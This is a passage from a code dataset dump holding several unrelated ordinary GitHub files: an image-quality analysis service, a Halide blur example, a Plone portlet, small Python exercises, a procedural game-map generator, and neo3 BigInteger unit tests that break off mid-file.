экстремум\")\n diff_ax.plot(X_plot[:, 0], np.exp(log_dens_blue), '-', label=\"Функция аппроксимации с ядром Епанечникова\")\n diff_ax.legend(loc='upper right')\n\n # Проверка принадлежности к интервалу от 0 до 255 и назначение уровня освещенности по координате X_extremum\n # Координаты экстремума:\n\n m = max(samples)\n index_global_max = [i for i, j in enumerate(samples) if j == m]\n X_extremum = int(xc_1[index_global_max])\n\n rec = \"\"\n if X_extremum in range(0, 43):\n rec = \"Изображение слишком темное -3exp\"\n elif X_extremum in range(43, 85):\n rec = \"Изображение весьма темное -2exp\"\n elif X_extremum in range(85, 128):\n rec = \"Изображение немного темное -1exp\"\n elif X_extremum in range(128, 170):\n rec = \"Изображение немного светлое +1exp\"\n elif X_extremum in range(170, 212):\n rec = \"Изображение весьма светлое +2exp\"\n elif X_extremum in range(212, 255):\n rec = \"Изображение слишком светлое +3exp\"\n\n #\n\n plt.savefig(TRAINED_FACES_PATH + \"/\" + \"img/4/\" + filename)\n\n return X_extremum, rec\n\n\ndef analyze_photo(cat, filename, id_tut):\n url = cat + filename\n\n image = _grab_image(url=url)\n gray_img = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n fm = get_variance_of_laplacian(gray_img)\n\n faces = detector.detectMultiScale(gray_img, scaleFactor=1.1, minNeighbors=5,\n minSize=(30, 30), flags=0)\n for (x, y, w, h) in faces:\n cv2.rectangle(gray_img, (x, y), (x + w, y + h), (255, 0, 0), 2)\n roi_gray = gray_img[y:y + h, x:x + w]\n roi_color = image[y:y + h, x:x + w]\n eyes = detector.detectMultiScale(roi_gray)\n for (ex, ey, ew, eh) in eyes:\n cv2.rectangle(roi_color, (ex, ey), (ex + ew, ey + eh), (0, 255, 0), 2)\n\n # рисуем линии\n draw_lines_of_composition(image)\n # композиция\n cv2.imwrite(TRAINED_FACES_PATH + \"/\" + \"img/1/\" + filename, image)\n\n image = _grab_image(url=url)\n # фокус лапласиан\n a = print_blur_image(image, 9)\n # focus\n iMax = 9\n sum = 0\n for iW in range(0, iMax, 1):\n for iH in range(0, iMax, 1):\n if iH == 0 or iH == 8 or iW == 0 or iW == 8:\n a[iH][iW] = int(a[iH][iW] * 0.25)\n elif iH == 1 or iH == 7 or iW == 1 or iW == 7:\n a[iH][iW] = int(a[iH][iW] * 0.5)\n elif iH == 2 or iH == 6 or iW == 2 or iW == 6:\n a[iH][iW] = int(a[iH][iW] * 0.75)\n sum = sum + a[iH][iW]\n fcs = 0.5 * (int(fm) + int(sum / (iMax * iMax)))\n\n cv2.imwrite(TRAINED_FACES_PATH + \"/\" + \"img/0/\" + filename, image)\n cv2.imwrite(TRAINED_FACES_PATH + \"/\" + \"img/5/\" + filename, gray_img)\n\n # фокус конутрный\n imgcn = _grab_image(url=url)\n gray = cv2.cvtColor(imgcn, cv2.COLOR_BGR2GRAY)\n cnt_0 = get_conturs(imgcn, gray)\n a = print_conturs_of_image(imgcn, 9)\n\n sum = 0\n for iW in range(0, iMax, 1):\n for iH in range(0, iMax, 1):\n if iH == 0 or iH == 8 or iW == 0 or iW == 8:\n a[iH][iW] = int(a[iH][iW] * 0.25)\n elif iH == 1 or iH == 7 or iW == 1 or iW == 7:\n a[iH][iW] = int(a[iH][iW] * 0.5)\n elif iH == 2 or iH == 6 or iW == 2 or iW == 6:\n a[iH][iW] = int(a[iH][iW] * 0.75)\n sum = sum + a[iH][iW]\n cnt = 0.5 * (int(cnt_0) + int(sum / (iMax * iMax)))\n\n cv2.imwrite(TRAINED_FACES_PATH + \"/\" + \"img/3/\" + filename, imgcn)\n\n # гистограмма\n imgcn = _grab_image(url=url)\n lgh, rec = draw_histogram(imgcn, filename)\n res = int((fcs + cnt + lgh) / 3)\n\n text = \"\"\n return 'Изображение обработано ' + \"{}{:.2f}\".format(text, fm), fcs, cnt, lgh, res, rec\n","repo_name":"anastasia-zamula/img-rcm-sys","sub_path":"app/services.py","file_name":"services.py","file_ext":"py","file_size_in_byte":19019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"28192287823","text":"import sys; sys.path += ['..', '.']\nfrom halide import *\n\nOUT_DIMS = (6400, 4864, 3)\n\ndef filter_func(dtype=UInt(16)):\n \"Simple 3x3 blur.\"\n input = UniformImage(dtype, 2, 'input')\n x = Var('x')\n y = Var('y')\n #c = Var('c')\n blur_x = Func('blur_x')\n blur_y = Func('blur_y')\n\n blur_x[x,y] = (input[x,y]+input[x+1,y]+input[x+2,y])/3\n blur_y[x,y] = (blur_x[x,y]+blur_x[x,y+1]+blur_x[x,y+2])/3\n \n tune_ref_schedules = {'human': \\\n \"blur_y.split(y, y, yi, 8).parallel(y).vectorize(x, 8)\\n\" \\\n \"blur_x.chunk(y, yi).vectorize(x, 8)\"}\n #tune_constraints = 'blur_y.bound(c, 0, 3)'\n tune_in_images = ['apollo1.png']\n tune_out_dims = OUT_DIMS\n\n return (input, blur_y, None, locals())\n\ndef main():\n (input, out_func, evaluate, local_d) = filter_func()\n\n x, y = local_d['x'], local_d['y'] #, local_d['c']\n blur_x, blur_y = local_d['blur_x'], local_d['blur_y']\n\n xi, yi = Var('xi'), Var('yi')\n\n schedule = 1\n \n if schedule == 0: # Human schedule, no store-compute chunking\n blur_y.tile(x, y, xi, yi, 8, 4).parallel(y).vectorize(xi, 8)\n blur_x.chunk(x).vectorize(x, 8)\n elif schedule == 1:\n blur_y.split(y, y, yi, 8).parallel(y).vectorize(x, 8)\n blur_x.chunk(y, yi).vectorize(x, 8)\n \n test = filter_image(input, out_func, os.path.join(inputs_dir(), 'apollo.png'), disp_time=True, out_dims = OUT_DIMS, times=5)().show()\n\nif __name__ == '__main__':\n main()\n\n \n","repo_name":"hksonngan/Halide","sub_path":"py_bindings/examples/blur.py","file_name":"blur.py","file_ext":"py","file_size_in_byte":1519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"43"} +{"seq_id":"27471857403","text":"from zope import schema\nfrom zope.component import getMultiAdapter\nfrom zope.formlib import form\nfrom zope.interface import implements\nfrom plone.app.portlets.portlets import base\nfrom plone.portlets.interfaces import IPortletDataProvider\nfrom Products.Five.browser.pagetemplatefile import ViewPageTemplateFile\nfrom Products.CMFPlone import PloneMessageFactory as _\nfrom isaw.theme.portlets.widget import ImageWidget\n\nclass IFeaturedPortlet(IPortletDataProvider):\n\n image = schema.Field(\n title=_(u'Featured Image'),\n description=_(u'A small image from the current feature'),\n required=False)\n\n featured_title = schema.TextLine(\n title=_(u'Title of Current Feature'),\n description=_(u'Title to appear on the front page about current feature.'),\n required=False)\n \n featured_description = schema.Text(\n title=_(u'Description of Current Feature'),\n description=_(u'Description of current feature as it will appear on the front page.'),\n required=False)\n\n featured_lefttext = schema.TextLine(\n title=_(u'The text that appears to the left of this portlet'),\n description=_(u'Text to appear on the left'),\n required=False)\n\nclass Assignment(base.Assignment):\n implements(IFeaturedPortlet)\n\n header = u''\n image = None\n assignment_context_path = None\n\n def __init__(self,\n image=None, \n featured_title=None,\n featured_description=None,\n featured_lefttext=None,\n header=None,\n assignment_context_path=None):\n\n self.image = image\n self.featured_title = featured_title\n self.featured_description = featured_description\n self.featured_lefttext = featured_lefttext\n self.header = header\n self.assignment_context_path = assignment_context_path\n\n @property\n def title(self):\n if self.header:\n return self.header\n else:\n return _(u\"Feature Portlet\")\n\nclass Renderer(base.Renderer):\n\n render = ViewPageTemplateFile('feature.pt')\n\n def title(self):\n return self.data.featured_title\n\n def description(self):\n return self.data.featured_description\n\n def lefttext(self):\n return self.data.featured_lefttext\n\n @property\n def image_tag(self):\n if self.data.image:\n state=getMultiAdapter((self.context, self.request),\n name=\"plone_portal_state\")\n portal=state.portal()\n #assignment_url = \\\n # portal.unrestrictedTraverse(\n # self.data.assignment_context_path).absolute_url()\n assignment_url = \"isaw/++contextportlets++plone.rightcolumn\"\n width = self.data.image.width\n height = self.data.image.height\n return \"%s\" % \\\n (assignment_url,\n self.data.__name__,\n self.data.featured_description)\n return None\n\nclass AddForm(base.AddForm):\n form_fields = form.Fields(IFeaturedPortlet)\n form_fields['image'].custom_widget = ImageWidget\n label = _(u\"Add Featured Portlet\")\n\n def create(self, data):\n assignment_context_path = \\\n '/'.join(self.context.__parent__.getPhysicalPath())\n return Assignment(assignment_context_path=assignment_context_path, **data)\n\nclass EditForm(base.EditForm):\n \n form_fields = form.Fields(IFeaturedPortlet)\n form_fields['image'].custom_widget = ImageWidget\n description = _(u\"This portlet displays featured front page copy.\")\n","repo_name":"isaw/isaw.web","sub_path":"src/isaw.theme/isaw/theme/portlets/feature.py","file_name":"feature.py","file_ext":"py","file_size_in_byte":3724,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"24212946494","text":"\"\"\"\n1. Implement the factorial function and test it with several different values.\nCross- check with a calculator.\n\"\"\"\n\nfrom math import factorial\nfrom random import randint\n\ncount = 1\n\nwhile count != 6:\n x = randint(0, 7)\n print(\"Test \" + str(count) + \" for number \" + str(x) + \":\", factorial(x))\n count += 1\n","repo_name":"nihathalici/Full-Speed-Python","sub_path":"C06-Exercises-with-recursive-functions/Question-1.py","file_name":"Question-1.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"30453655028","text":"# coding: utf-8\n\nimport bottle\nimport cloudcode\n\n__author__ = 'asaka'\n\n\n@bottle.route('/')\ndef index():\n return 'Hello LeanCloud!'\n\n\n@cloudcode.cloud_func\ndef add(params):\n user = cloudcode.user\n return params['x'] + params['y']\n\n\n@cloudcode.cloud_hook('Album', 'before_save')\ndef before_album_save(obj):\n user = cloudcode.user\n return 'ok'\n\n\napp = bottle.default_app()\napp = cloudcode.wrap(app)\n\nif __name__ == '__main__':\n cloudcode.run('localhost', 5000, app)\n","repo_name":"aisk/cloudcode-python-sdk","sub_path":"examples/bottle_example.py","file_name":"bottle_example.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"1752014168","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.linear_model import LinearRegression\n\n\nnp.random.seed(0)\nx = np.random.rand(50, 1) * 10 # 0 and 10\ny = 2 * x + 1 + np.random.randn(50, 1) # y values added to real regression line\n\n# x and y are prebuilt NumPy arrays and represent the x and y values of the dataset.\n# The .flatten() method makes a multidimensional NumPy array one-dimensional. This makes it have a neater structure when creating Pandas DataFrame.\n# The expression pd.DataFrame({'x': x.flatten(), 'y': y.flatten()}) creates a Pandas DataFrame containing the x and y values. This DataFrame consists of two columns, x column and y column. Each row has its corresponding row of x and y values.\ndata = pd.DataFrame({'x': x.flatten(), 'y': y.flatten()})\n\n# Creating Regression\nregression_model = LinearRegression()\nregression_model.fit(x, y)\n\n# Drawring regression lineat\nplt.figure(figsize=(10, 6))\nplt.scatter(data['x'], data['y'], label='Veri Noktaları')\nplt.plot(x, regression_model.predict(x), color='red', label='Regresyon Doğrusu')\nplt.title('Veri Regresyonu Örneği')\nplt.xlabel('x Değeri')\nplt.ylabel('y Değeri')\nplt.legend()\nplt.grid(True)\nplt.show()\n","repo_name":"gzmsrtkyozyldz/machine-learning","sub_path":"regression.py","file_name":"regression.py","file_ext":"py","file_size_in_byte":1213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"27523898109","text":"entry = input().split(' : ')\ndi = {}\nwhile entry[0] != 'end':\n name = entry[1]\n course = entry[0]\n\n if course not in di:\n di[course] = []\n di[course].append(name)\n entry = input ().split (' : ')\n\nfor cousres, students in di.items():\n print(f\"{cousres}: {len(students)}\")\n for name_of_sudent in students:\n print(f\"-- {''.join(name_of_sudent)}\")\n# sorted_= sorted(di.items(),key=)","repo_name":"MbStanchev/SoftUni","sub_path":"Fundamentals/UPR/UPR7_dictionary/courses.py","file_name":"courses.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"32536115923","text":"#############################################################################\ndef _random(min, max): #IT'S JUST A WRAPPER. Min, max inclusive! #\n return _rand(max-min+1)+min #\n #\n_LCG_X = None #\n #\ndef setRandomSeed(seed): # FOR TEH GREAT INDEPENDENCY!\n global _LCG_X #\n _LCG_X = seed #\n #\ndef _rand(mod): #\n global _LCG_X #\n if _LCG_X is None: #\n _LCG_X = 7355608 #\n LCG_A = 14741 #\n LCG_C = 757 #\n LCG_M = 77777677777 #\n _LCG_X = (LCG_A*_LCG_X + LCG_C) % LCG_M #\n return _LCG_X%mod #\n#############################################################################\n\ndef randHorDir(): #What a shame.\n return _random(-1, 1)\n\ndef randVertDir(): #What a shame.\n val = _random(0, 100)\n if val < 30:\n return -1\n elif val > 70:\n return 1\n else:\n return 0\n\n\nTOTAL_LAND_AUTOMS = 8\nTOTAL_MNT_AUTOMS = 5\nTOTAL_FOREST_AUTOMS = 12\nTOTAL_FIELD_AUTOMS = 5\nLAND_CYCLES = 620\nMNT_CYCLES = 175\nFOREST_CYCLES = 50\nFIELD_CYCLES = 15\n#_SINGLE_ELEMENT_PLACEMENT_TRIES = 10000\n_WATER_CODE = '~'\n_GROUND_CODE = '.'\n_MOUNTAIN_CODE = '^'\n_FOREST_CODE = 'f'\n_FIELD_CODE = '\"'\n_TOWN_CODE = 'O'\n_MILITARY_BASE_CODE = '%'\n_LAB_CODE = '&'\n\nclass Automata:\n def __init__(self, x, y, maparr, brush, allowed = []):\n self.x = x\n self.y = y\n self.maparr = maparr\n self.brush = brush\n self.allowed = allowed\n self.allowed.append(self.brush)\n\n def step(self):\n MAX_DIRECTION_TRIES = 1000\n dx = randHorDir()\n dy = randVertDir()\n for _ in range(MAX_DIRECTION_TRIES):\n while dx*dy != 0 or dx == dy:\n# randomize()\n dx = randHorDir()\n dy = randVertDir()\n if (0 < self.x+dx < len(self.maparr)-2 and 0 < self.y+dy < len(self.maparr[0])-2) and self.maparr[self.x+dx][self.y+dy] in self.allowed:\n self.x += dx\n self.y += dy\n self.maparr[self.x][self.y] = self.brush\n break\n\ndef addLandscapeElements(maparr, automs, brush, allowed:list, cycles, randomPlacement = True, minDistanceToMapBorder = 15):\n mapW = len(maparr)\n mapH = len(maparr[0])\n auts = []\n if randomPlacement:\n for i in range(1, automs + 1):\n selx = _random(0+minDistanceToMapBorder, mapW-minDistanceToMapBorder)\n sely = _random(0+minDistanceToMapBorder, mapH-minDistanceToMapBorder)\n while maparr[selx][sely] not in allowed:\n selx = _random(0 + minDistanceToMapBorder, mapW - minDistanceToMapBorder)\n sely = _random(0 + minDistanceToMapBorder, mapH - minDistanceToMapBorder)\n auts.append(Automata(selx, sely, maparr, brush, allowed))\n else:\n for i in range(1, automs+1):\n x = i * mapW // (TOTAL_LAND_AUTOMS + 1)\n y = i * mapH // (TOTAL_LAND_AUTOMS + 1)\n auts.append(Automata(x, y, maparr, _GROUND_CODE, [_WATER_CODE]))\n for aut in auts:\n for _ in range(cycles):\n aut.step()\n\n\ndef countSurroundings(maparr, x, y, code): #returns the number of given surroundings for the tile\n mapW = len(maparr)\n mapH = len(maparr[0])\n result = 0\n for i in [-1, 0, 1]:\n for j in [-1, 0, 1]:\n if not (0 < x+i < mapW and 0 < y+j < mapH):\n continue\n if (i !=0 or j != 0) and maparr[x+i][y+j] == code:\n result += 1\n return result\n\n\n#Crap, but working\ndef tryRandomlyAddSingleElements(maparr, elemCode, neighbours:list, neighborMinNumber:list, elemCount:int, minDistance = 2):\n _SINGLE_ELEMENT_PLACEMENT_TRIES = 500\n #adds some single-tile element (i.e. town, military base...) on the random map\n mapW = len(maparr)\n mapH = len(maparr[0])\n x = 0\n y = 0\n placedXcoords = [0] * (elemCount+1) #coords of already placed elems\n placedYcoords = [0] * (elemCount+1) #coords of already placed elems\n totalPlaced = 0\n\n for currentPlacingElementNumber in range(elemCount+1):\n for _ in range(_SINGLE_ELEMENT_PLACEMENT_TRIES):\n successfulPlacement = True\n distanceSatisfied = False\n #The following loop is the distance check.\n #Elems should not be placed closer than minDistance allows\n while not distanceSatisfied and currentPlacingElementNumber > 0:\n x = _random(1, mapW - 1)\n y = _random(1, mapH - 1)\n for i in range(currentPlacingElementNumber):\n if (x-placedXcoords[i]) ** 2 + (y - placedYcoords[i]) ** 2 < minDistance ** 2:\n distanceSatisfied = False\n break\n else:\n distanceSatisfied = True\n #Checking necessary neighbours condition.\n for i, currentCheck in enumerate(neighbours):\n currentCheckCount = countSurroundings(maparr, x, y, currentCheck)\n if currentCheckCount < neighborMinNumber[i] :\n successfulPlacement = False\n break\n if not successfulPlacement:\n continue\n #place elems, add placed coords to the array.\n maparr[x][y] = elemCode\n if (currentPlacingElementNumber != elemCount):\n placedXcoords[currentPlacingElementNumber] = x\n placedYcoords[currentPlacingElementNumber] = y\n totalPlaced += 1\n break\n if totalPlaced < elemCount:\n return False\n return True\n\n#TODO: add the possibility to choose unnecessary neighbours (like \"mountain OR forest\")\n#TODO: SPEED THE FUCK UP THIS CRAP!\ndef tryAddSingleElements(maparr, elemCode, neighbours:list, neighborMinNumber:list, elemCount:int, minDistance = 2):\n #adds some single-tile element (i.e. town, military base...) on the random map\n mapW = len(maparr)\n mapH = len(maparr[0])\n x = 1\n y = 1\n placedXcoords = [0] * elemCount #coords of already placed elems\n placedYcoords = [0] * elemCount #coords of already placed elems\n totalPlaced = 0\n for currentPlacingElementNumber in range(elemCount):\n #for _ in range(_SINGLE_ELEMENT_PLACEMENT_TRIES): # <-- not needed if placement coords aren't random...\n distanceSatisfied = False\n while True:\n successfulPlacement = True\n x += 1#random(1, mapW - 1)\n #y = _random(1, mapH - 1)\n if x >= mapW:\n x = 0\n y+=1\n if (y == mapH):\n return False\n if maparr[x][y] == _WATER_CODE:\n continue\n #check distance satisfaction...\n if currentPlacingElementNumber > 0:\n for i in range(currentPlacingElementNumber):\n currSquareDist = (x-placedXcoords[i]) ** 2 + (y - placedYcoords[i]) ** 2\n distanceSatisfied = currSquareDist >= minDistance ** 2\n if not distanceSatisfied:\n break\n if not distanceSatisfied:\n x += currSquareDist//4\n continue\n #Checking necessary neighbouring tiles condition.\n for i, currentCheck in enumerate(neighbours):\n currentCheckCount = countSurroundings(maparr, x, y, currentCheck)\n if currentCheckCount < neighborMinNumber[i] :\n successfulPlacement = False\n break\n if not successfulPlacement:\n continue\n #place elems, add placed coords to the arrays.\n maparr[x][y] = elemCode\n if (currentPlacingElementNumber != elemCount):\n placedXcoords[currentPlacingElementNumber] = x\n placedYcoords[currentPlacingElementNumber] = y\n totalPlaced += 1\n break\n if totalPlaced < elemCount:\n return False\n return True\n\n\n# def drawMap(maparr):\n# for i in range(len(maparr)):\n# for j in range(len(maparr[i])):\n# if maparr[i][j] == _WATER_CODE:\n# setForegroundColor(0, 64, 255)\n# elif maparr[i][j] == _GROUND_CODE:\n# setForegroundColor(200, 64, 64)\n# elif maparr[i][j] == _MOUNTAIN_CODE:\n# setForegroundColor(200, 200, 200)\n# elif maparr[i][j] == _FOREST_CODE:\n# setForegroundColor(0, 255, 64)\n# elif maparr[i][j] == _FIELD_CODE:\n# setForegroundColor(220, 220, 0)\n# elif maparr[i][j] == _TOWN_CODE:\n# setForegroundColor(255, 128, 255)\n# elif maparr[i][j] == _MILITARY_BASE_CODE:\n# setForegroundColor(255, 0, 0)\n# elif maparr[i][j] == _LAB_CODE:\n# setForegroundColor(0, 255, 255)\n# putChar(maparr[i][j], i, j)\n\ndef generateMap(mapW, mapH):\n while True:\n maparr = [[_WATER_CODE] * (mapH) for _ in range(mapW)]\n #land\n addLandscapeElements(maparr, TOTAL_LAND_AUTOMS, _GROUND_CODE, [_WATER_CODE], LAND_CYCLES, False, minDistanceToMapBorder=8)\n #mountains\n addLandscapeElements(maparr, TOTAL_MNT_AUTOMS, _MOUNTAIN_CODE, [_GROUND_CODE], MNT_CYCLES,\n minDistanceToMapBorder=4)\n # forest\n addLandscapeElements(maparr, TOTAL_FOREST_AUTOMS, _FOREST_CODE, [_GROUND_CODE, _MOUNTAIN_CODE], FOREST_CYCLES,\n minDistanceToMapBorder=4)\n #fields\n addLandscapeElements(maparr, TOTAL_FIELD_AUTOMS, _FIELD_CODE, [_GROUND_CODE, _FOREST_CODE], FIELD_CYCLES,\n minDistanceToMapBorder=2)\n # towns\n Neigh = [_FIELD_CODE]\n NeighNum = [3]\n if not tryAddSingleElements(maparr, _TOWN_CODE, Neigh, NeighNum, elemCount=TOTAL_FIELD_AUTOMS, minDistance=7):\n continue\n # Military\n Neigh = [_GROUND_CODE]\n NeighNum = [7]\n if not tryAddSingleElements(maparr, _MILITARY_BASE_CODE, Neigh, NeighNum, 2, minDistance=15):\n continue\n # Labs\n Neigh = [_MOUNTAIN_CODE]\n NeighNum = [7]\n if not tryAddSingleElements(maparr, _LAB_CODE, Neigh, NeighNum, 2, minDistance=7):\n continue\n break\n return maparr\n","repo_name":"sidav/ShadowPriest","sub_path":"Procedurals/CALandscapeGenerator.py","file_name":"CALandscapeGenerator.py","file_ext":"py","file_size_in_byte":11260,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"72924290371","text":"from unittest import TestCase\nfrom neo3.core.types.uint import _UIntBase\nfrom neo3.core.types import BigInteger, UInt160, UInt256\nfrom neo3.core import serialization\n\nclass BigIntegerTestCase(TestCase):\n def test_big_integer_add(self):\n b1 = BigInteger(10)\n b2 = BigInteger(20)\n\n b3 = b1 + b2\n\n self.assertIsInstance(b3, BigInteger)\n self.assertEqual(30, b3)\n\n def test_big_integer_sub(self):\n b1 = BigInteger(5505505505505505050505)\n b2 = BigInteger(5505505505505505000000)\n\n b3 = b1 - b2\n\n self.assertIsInstance(b3, BigInteger)\n self.assertEqual(50505, b3)\n\n def test_big_integer_mul(self):\n b1 = BigInteger(55055055055055)\n b2 = BigInteger(55055055055)\n\n b3 = b1 * b2\n\n self.assertIsInstance(b3, BigInteger)\n self.assertEqual(3031059087112109081053025, b3)\n\n def test_big_integer_div(self):\n b1 = BigInteger(55055055055055)\n b2 = BigInteger(55055055)\n\n b3 = b1 / b2\n self.assertIsInstance(b3, BigInteger)\n self.assertEqual(1000000, b3)\n\n def test_big_integer_div2(self):\n b1 = BigInteger(41483775933600000000)\n b2 = BigInteger(414937759336)\n\n b3 = b1 / b2\n b4 = b1 // b2\n self.assertIsInstance(b3, BigInteger)\n self.assertEqual(99975899, b3)\n self.assertEqual(b4, b3)\n\n def test_big_integer_div_rounding(self):\n b1 = BigInteger(1)\n b2 = BigInteger(2)\n self.assertEqual(0, b1 / b2) # 0.5 -> 0\n\n b1 = BigInteger(2)\n b2 = BigInteger(3)\n self.assertEqual(0, b1 / b2) # 0.66 -> 0\n\n b1 = BigInteger(5)\n b2 = BigInteger(4)\n self.assertEqual(1, b1 / b2) # 1.25 -> 1\n\n b1 = BigInteger(5)\n b2 = BigInteger(3)\n self.assertEqual(1, b1 / b2) # 1.66 -> 1\n\n b1 = BigInteger(-1)\n b2 = BigInteger(3)\n self.assertEqual(0, b1 / b2) # -0.33 -> 0\n\n b1 = BigInteger(-5)\n b2 = BigInteger(3)\n self.assertEqual(-1, b1 / b2) # -1.66 -> -1\n\n b1 = BigInteger(1)\n b2 = BigInteger(-2)\n self.assertEqual(0, b1/b2)\n\n def test_big_integer_div_old_block1473972(self):\n b1 = BigInteger(-11001000000)\n b2 = BigInteger(86400)\n result = b1 / b2\n self.assertEqual(-127326, result)\n\n def test_big_integer_float(self):\n b1 = BigInteger(5505.001)\n b2 = BigInteger(55055.999)\n\n b3 = b1 + b2\n\n self.assertIsInstance(b3, BigInteger)\n self.assertEqual(60560, b3)\n\n def test_big_integer_to_bytearray(self):\n b1 = BigInteger(8972340892734890723)\n ba = b1.to_bytearray()\n\n integer = BigInteger.frombytes(ba)\n self.assertEqual(8972340892734890723, integer)\n\n b2 = BigInteger(-100)\n b2ba = b2.to_bytearray()\n integer2 = BigInteger.frombytes(b2ba)\n self.assertEqual(-100, integer2)\n\n b3 = BigInteger(128)\n b3ba = b3.to_bytearray()\n self.assertEqual(b'\\x80\\x00', b3ba)\n\n b4 = BigInteger(0)\n b4ba = b4.to_bytearray()\n self.assertEqual(b'\\x00', b4ba)\n\n b5 = BigInteger(-146)\n b5ba = b5.to_bytearray()\n self.assertEqual(b'\\x6e\\xff', b5ba)\n\n b6 = BigInteger(-48335248028225339427907476932896373492484053930)\n b6ba = b6.to_bytearray()\n self.assertEqual(20, len(b6ba))\n\n b7 = BigInteger(-399990000)\n b7ba = b7.to_bytearray()\n self.assertEqual(b'\\x10\\xa3\\x28\\xe8', b7ba)\n\n b8 = BigInteger(-65023)\n b8ba = b8.to_bytearray()\n self.assertEqual(b'\\x01\\x02\\xff', b8ba)\n\n def test_big_integer_frombytes(self):\n b1 = BigInteger(8972340892734890723)\n ba = b1.to_bytearray()\n\n b2 = BigInteger.frombytes(ba)\n self.assertEqual(b1, b2)\n self.assertTrue(b1 == b2)\n\n def test_big_integer_sign(self):\n b1 = BigInteger(3)\n b2 = BigInteger(0)\n b3 = BigInteger(-4)\n self.assertEqual(1, b1.sign)\n self.assertEqual(0, b2.sign)\n self.assertEqual(-1, b3.sign)\n\n def test_big_integer_modulo(self):\n b1 = BigInteger(860593)\n b2 = BigInteger(-201)\n self.assertEqual(112, b1 % b2)\n\n b1 = BigInteger(20195283520469175757)\n b2 = BigInteger(1048576)\n self.assertEqual(888269, b1 % b2)\n\n b1 = BigInteger(-18224909727634776050312394179610579601844989529623334093909233530432892596607)\n b2 = BigInteger(14954691977398614017)\n self.assertEqual(-3100049211437790421, b1 % b2)\n\n b3 = BigInteger.frombytes(b'+K\\x05\\xbe\\xaai\\xfa\\xd4')\n self.assertEqual(b3, b1 % b2)\n\n def test_dunder_methods(self):\n b1 = BigInteger(1)\n b2 = BigInteger(2)\n b3 = BigInteger(3)\n\n self.assertEqual(1, abs(b1))\n self.assertEqual(0, b1 % 1)\n self.assertEqual(-1, -b1)\n self.assertEqual(\"1\", str(b1))\n self.assertEqual(1, b3 // b2)\n\n right_shift = b3 >> b1\n self.assertEqual(1, right_shift)\n self.assertIsInstance(right_shift, BigInteger)\n\n left_shift = b1 << b3\n self.assertEqual(8, left_shift)\n self.assertIsInstance(left_shift, BigInteger)\n\n def test_negative_shifting(self):\n # C#'s BigInteger changes a left shift with a negative shift index,\n # to a right shift with a positive index.\n\n b1 = BigInteger(8)\n b2 = BigInteger(-3)\n # shift against BigInteger\n self.assertEqual(1, b1 << b2)\n # shift against integer\n self.assertEqual(1, b1 << -3)\n\n # the same as above but for right shift\n self.assertEqual(64, b1 >> b2)\n self.assertEqual(64, b1 >> -3)\n\n def test_specials(self):\n self.assertEqual(0, BigInteger.ZERO())\n self.assertEqual(1, BigInteger.ONE())\n b = BigInteger.ZERO()\n\nclass UIntBase(_UIntBase):\n def serialize(self) -> bytearray:\n pass\n\n @classmethod\n def deserialize(cls, data: bytes):\n pass\n\nclass UIntBaseTest(TestCase):\n def test_create_with_empty_data(self):\n x = UIntBase(num_bytes=2)\n self.assertEqual(len(x._data), 2)\n self.assertEqual(x._data, b'\\x00\\x00')\n\n def test_valid_data(self):\n x = UIntBase(num_bytes=2, data=b'aabb')\n # test for proper conversion to raw bytes\n self.assertEqual(len(x._data), 2)\n self.assertNotEqual(len(x._data), 4)\n\n x = UIntBase(num_bytes=3, data=bytearray.fromhex('aabbcc'))\n self.assertEqual(len(x._data), 3)\n self.assertNotEqual(len(x._data), 6)\n\n def test_valid_rawbytes_data(self):\n x = UIntBase(num_bytes=2, data=b'\\xaa\\xbb')\n self.assertEqual(len(x._data), 2)\n self.assertNotEqual(len(x._data), 4)\n\n def test_invalid_data_type(self):\n with self.assertRaises(TypeError) as context:\n x = UIntBase(num_bytes=2, data='abc')\n self.assertTrue(\"Invalid data type\" in str(context.exception))\n\n def test_raw_data_that_can_be_decoded(self):\n \"\"\"\n some raw data can be decoded e.g. bytearray.fromhex('1122') but shouldn't be\n \"\"\"\n tricky_raw_data = bytes.fromhex('1122')\n x = UIntBase(num_bytes=2, data=tricky_raw_data)\n self.assertEqual(x._data, tricky_raw_data)\n\n def test_data_length_mistmatch(self):\n with self.assertRaises(ValueError) as context:\n x = UIntBase(num_bytes=2, data=b'aa') # 2 != 1\n self.assertTrue(\"Invalid UInt: data length\" in str(context.exception))\n\n def test_size(self):\n x = UIntBase(num_bytes=2, data=b'\\xaa\\xbb')\n self.assertEqual(len(x), 2)\n\n def test_hash_code(self):\n x = UIntBase(num_bytes=4, data=bytearray.fromhex('DEADBEEF'))\n self.assertEqual(hash(x), 4022250974)\n x = UIntBase(num_bytes=2, data=bytearray.fromhex('1122'))\n self.assertEqual(hash(x), 8721)\n\n def test_to_string(self):\n x = UIntBase(num_bytes=2, data=bytearray.fromhex('1122'))\n self.assertEqual('2211', str(x))\n self.assertNotEqual('1122', str(x))\n\n def test_equal(self):\n x = UIntBase(num_bytes=2, data=bytearray.fromhex('1122'))\n y = UIntBase(num_bytes=2, data=bytearray.fromhex('1122'))\n z = UIntBase(num_bytes=2, data=bytearray.fromhex('2211'))\n\n self.assertFalse(x == None)\n self.assertFalse(x == int(1122))\n self.assertTrue(x == x)\n self.assertTrue(x == y)\n self.assertTrue(x != z)\n\n def test_hash(self):\n x = UIntBase(num_bytes=2, data=bytearray.fromhex('1122'))\n y = UIntBase(num_bytes=2, data=bytearray.fromhex('1122'))\n z = UIntBase(num_bytes=2, data=bytearray.fromhex('2211'))\n self.assertEqual(hash(x), hash(y))\n self.assertNotEqual(hash(x), hash(z))\n\n def 